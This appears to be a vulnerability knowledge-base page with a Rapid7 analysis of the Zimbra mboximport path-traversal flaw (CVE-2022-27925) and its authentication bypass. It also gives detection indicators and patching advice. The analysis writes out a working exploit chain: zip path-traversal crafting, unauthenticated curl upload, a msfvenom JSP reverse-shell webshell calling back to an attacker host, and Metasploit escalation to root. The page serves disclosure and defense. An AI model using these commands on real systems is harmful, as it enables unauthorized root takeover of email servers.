Very High
CVE-2022-27925
CVE-2022-27925
Description
Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.
Add Assessment
Technical Analysis
This is really bad – remote root on an organization’s email server, if combined with other (currently 0-day vulnerabilities). Patch ASAP!
Technical Analysis
A July 2024 bulletin from multiple U.S. government agencies indicates that North Korean state-sponsored attackers have demonstrated interest in this vulnerability — not immediately clear whether it was exploited or just used in reconnaissance/target selection: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a
CVSS V3 Severity and Metrics
General Information
Vendors
- zimbra
Products
- collaboration 8.8.15,
- collaboration 9.0.0
Metasploit Modules
References
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
Technical Analysis
Description
In late March 2022, Zimbra released versions 9.0.0 patch 24 and 8.8.15 patch 31 to address multiple vulnerabilities in Zimbra Collaboration Suite, including CVE-2022-27924 (which we wrote about previously) and CVE-2022-27925.
Originally, Zimbra called CVE-2022-27925 an authenticated path-traversal attack, where an administrative user could write files into any directory on the filesystem as the Zimbra account. Because it was originally thought to be an administrator-only attack, NVD assigned it a CVSS base score of 7.8. Later, Volexity noticed that attackers exploiting this vulnerability had found a way to bypass the administrative requirements, and wrote about it on August 10, 2022. This new authentication bypass got a new identifier – CVE-2022-37042.
By combining the original path-traversal vulnerability and new authentication bypass, attackers can remotely compromise a Zimbra Collaboration Suite system via the administrator port (by default, 7071) anonymously. Combined with a currently unpatched privilege escalation vulnerability that we recently wrote about and wrote an exploit for, these three vulnerabilities lead to remote command execution as the root user on unpatched systems.
Although the public advisories don’t mention it, according to our analysis, Zimbra Collaboration Suite Network Edition (the paid edition) is vulnerable, and the Open Source Edition (free) is not (since it does not have the vulnerable mboximport endpoint). Vulnerable versions are:
- Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
- Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)
These vulnerabilities (and others in Zimbra) are being targeted for widespread exploitation in the wild, and should therefore be patched or taken offline as soon as possible. If you suspect you’ve been compromised, Zimbra provides steps to rebuild your Zimbra Collaboration Suite server from scratch on the latest patch without losing data.
Technical analysis
The core issue in CVE-2022-27925 is that the /service/extension/backup/mboximport endpoint on Zimbra Collaboration Suite’s administrative port (7071 by default), which is designed to accept a .zip file import, does not validate paths and is therefore vulnerable to a path-traversal attack. A .zip file with a relative path can write anywhere on the file system. To demonstrate, we created a .zip file with a long path, then replaced that path with path traversal:
$ echo 'Hello, world!' > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa $ zip test.zip aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa adding: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (stored 0%) $ sed -i 's|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|../../../../../../../../../../../tmp/test.txt|' test.zip
Then we upload it to the Zimbra server using cURL, passing a valid token (which, as we’ll see, is actually not required):
$ curl -X POST -k 'https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1' -b 'ZM_AUTH_TOKEN=0_530[...]b' --data-binary **[@test](/contributors/test)**.zip <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/> <title>Error 400 Error importing mailbox for account admin on server 10.0.0.166: unable to read metadata for account f4ddb29a-340f-4373-8171-c18b64c4b485</title> </head> [...]
We can verify it’s written to the server:
root@zimbra6:~# ls -l /tmp/test.txt -rw-r----- 1 zimbra zimbra 14 Aug 18 22:18 /tmp/test.txt root@zimbra6:~# cat /tmp/test.txt Hello, world!
The more recent authentication-bypass vulnerability – CVE-2022-37042 – was simply that the authentication cookie is not actually necessary:
$ echo 'Hello, world!' > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa $ zip test2.zip aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa adding: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (stored 0%) $ sed -i 's|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|../../../../../../../../../../../tmp/test2.txt|' test2.zip $ curl -X POST -k 'https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1' --data-binary **[@test](/contributors/test)**2.zip $ ssh root@10.0.0.166 cat /tmp/test2.txt Hello, world!
We can also create a JSP payload using msfvenom, then upload it to the public webroot:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 RHOST=10.0.0.166 -f jsp -o aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 130 bytes Final size of jsp file: 1919 bytes Saved as: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa $ zip test3.zip aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa adding: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (deflated 59%) $ sed -i 's|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp|' test3.zip $ curl -X POST -k 'https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1' --data-binary **[@test](/contributors/test)**3.zip <html> [...]
Then set up a Metasploit listener:
msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp PAYLOAD => linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 10.0.0.146 LHOST => 10.0.0.146 msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.0.0.146:4444
Trigger the payload:
curl -k 'https://10.0.0.166/public/backdoor.jsp'
And get the shell:
msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.0.0.146:4444 [*] Sending stage (3020772 bytes) to 10.0.0.166 [*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:54702) at 2022-08-18 15:32:50 -0700 meterpreter > getuid Server username: zimbra
And, for bonus points, use an 0-day to get root:
meterpreter > bg [*] Backgrounding session 1... msf6 exploit(multi/handler) > use exploit/linux/local/zimbra_slapper_priv_esc [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 1 SESSION => 1 msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit [*] Started reverse TCP handler on 10.0.0.146:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Executing: sudo -n -l [+] The target appears to be vulnerable. [*] Creating exploit directory: /tmp/.pz8ORN [*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.pz8ORN/.w7ryDXBV [*] Sending stage (3020772 bytes) to 10.0.0.166 [+] Deleted /tmp/.pz8ORN [*] Meterpreter session 2 opened (10.0.0.146:4444 -> 10.0.0.166:34904) at 2022-08-18 15:34:49 -0700 meterpreter > getuid Server username: root
IOCs
This vulnerability lets us overwrite an arbitrary file, so an attacker can exploit this in a variety of ways depending on their goal. The most obvious exploit route, however, is the one we demonstrated – writing a webshell to the public directory (either zimbra/ or zimbraAdmin/). Any unusual files in those folders should be suspect.
The file /opt/zimbra/log/mailbox.log logs any bad .zip file it receives with entries such as:
2022-08-18 22:27:57,060 ERROR [qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1] [] mboxmove - Auth failed 2022-08-18 22:27:57,061 INFO [qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1] [] mboxmove - Importing mailbox for account admin overwrite=true 2022-08-18 22:27:57,062 INFO [qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1] [] mboxmove - Importing data for admin into mailbox id 1. 2022-08-18 22:27:57,062 WARN [qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1] [] mboxmove - IO error java.io.IOException: unable to read metadata for account f4ddb29a-340f-4373-8171-c18b64c4b485 at com.zimbra.cs.backup.util.Utils.IOException(Utils.java:72) at com.zimbra.cs.backup.ZipBackupTarget$RestoreAcctSession.<init>(ZipBackupTarget.java:418) at com.zimbra.cs.backup.ZipBackupTarget.getAccountSession(ZipBackupTarget.java:142) [...] Caused by: com.zimbra.common.service.ServiceException: system failure: Unable to parse XML file /opt/zimbra/backup/tmp/mboxmove/f4ddb29a-340f-4373-8171-c18b64c4b485/meta.xml ExceptionId:qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1:1660861677062:468a5dc6ec65dbfe Code:service.FAILURE at com.zimbra.common.service.ServiceException.FAILURE(ServiceException.java:288) at com.zimbra.cs.backup.XmlMeta.readAccountBackup(XmlMeta.java:409) at com.zimbra.cs.backup.ZipBackupTarget$RestoreAcctSession.<init>(ZipBackupTarget.java:414)
Any of these errors would detect an attempted attack, as well as any accesses to the /service/extension/backup/mboximport endpoint, which is not typically used:
# cat /opt/zimbra/log/access_log.2022-08-18 10.0.0.146 - - [18/Aug/2022:22:17:03 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&append=1 HTTP/1.1" 400 387 "-" "curl/7.82.0" 2 10.0.0.146 - - [18/Aug/2022:22:17:09 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1 HTTP/1.1" 400 521 "-" "curl/7.82.0" 2 10.0.0.146 - - [18/Aug/2022:22:18:11 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1 HTTP/1.1" 400 521 "-" "curl/7.82.0" 2 10.0.0.146 - - [18/Aug/2022:22:25:32 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1 HTTP/1.1" 401 287 "-" "curl/7.82.0" 12 10.0.0.146 - - [18/Aug/2022:22:27:57 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1 HTTP/1.1" 401 287 "-" "curl/7.82.0" 12
Note that because this chain of exploits gains root access, attackers can tamper with logfiles at will.
Guidance
Because this is being actively exploited, Rapid7 strongly encourages all Zimbra Collaboration Suite users to either update their Zimbra installations, or to temporarily take them offline until they can be updated. If you suspect you’ve been compromised, you should rebuild your Zimbra server instead of trying to recover.
